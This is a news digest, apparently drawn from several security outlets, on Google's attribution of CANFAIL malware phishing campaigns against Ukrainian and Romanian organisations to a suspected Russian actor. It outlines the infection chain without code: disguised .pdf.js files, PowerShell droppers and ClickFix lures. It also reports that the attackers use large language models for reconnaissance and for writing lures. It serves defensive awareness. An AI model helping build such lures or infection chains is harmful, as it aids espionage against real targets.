Google Ties Suspected Russian Actor to CANFAIL Malware Attacks on Ukrainian Orgs

Key Findings

Google Threat Intelligence Group (GTIG) has identified a previously undocumented threat actor, possibly affiliated with Russian intelligence services, that has been targeting Ukrainian organizations with the CANFAIL malware.
The threat actor has primarily targeted defense, military, government, and energy organizations within the Ukrainian regional and national governments, but has also shown growing interest in aerospace, manufacturing with military/drone ties, nuclear and chemical research, and international organizations involved in Ukraine's conflict monitoring and humanitarian aid.
Despite being less sophisticated and resourced than other Russian threat groups, the actor has recently begun to overcome some technical limitations by leveraging large language models (LLMs) for reconnaissance, creating lures for social engineering, and solving basic technical questions for post-compromise activity and command-and-control infrastructure setup.

The threat actor has been conducting phishing campaigns, impersonating legitimate Ukrainian and Romanian energy organizations to obtain unauthorized access to organizational and personal email accounts.
The group has also masqueraded as a Romanian energy company that works with customers in Ukraine, in addition to targeting a Romanian firm and conducting reconnaissance on Moldovan organizations.
To enable its operations, the threat actor generates email address lists tailored to specific regions and industries based on their research.

The attack chains contain LLM-generated lures and embed Google Drive links pointing to a RAR archive containing the CANFAIL malware, often disguised with a double extension (*.pdf.js) to pass off as a PDF document.
CANFAIL is an obfuscated JavaScript malware that executes a PowerShell script, which then downloads and executes a memory-only PowerShell dropper. In parallel, it displays a fake "error" message to the victim.

The threat actor is also linked to a campaign called PhantomCaptcha, which was disclosed by SentinelOne SentinelLABS in October 2025. This campaign targeted organizations associated with Ukraine's war relief efforts through phishing emails that directed recipients to fake pages hosting ClickFix-style instructions to activate the infection sequence and deliver a WebSocket-based trojan.

GTIG has observed other Russian espionage groups, such as APT44 (Sandworm/FROZENBARENTS), TEMP.Vermin, UNC5125, UNC5792, UNC4221, UNC5976, and UNC6096, targeting Ukrainian and Western defense-related organizations using military- and drone-themed lures.
These groups have employed a variety of malware, including WAVESIGN, INFAMOUSCHISEL, VERMONSTER, SPECTRUM, MESSYFORK, GREYBATTLE, STALECOOKIE, TINYWHALE, and CraxsRAT, to steal information and hijack secure messaging accounts used by the Ukrainian military.

https://thehackernews.com/2026/02/google-ties-suspected-russian-actor-to.html
https://securityaffairs.com/187976/hacking/suspected-russian-hackers-deploy-canfail-malware-against-ukraine.html
https://x.com/xcybersecnews/status/2022448392949911781
https://www.news4hackers.com/google-links-russian-actor-to-canfail-malware-attacks-on-ukrainian-organizations/
https://x.com/TheCyberSecHub/status/2022363721679671428
https://x.com/shah_sheikh/status/2022363723936207012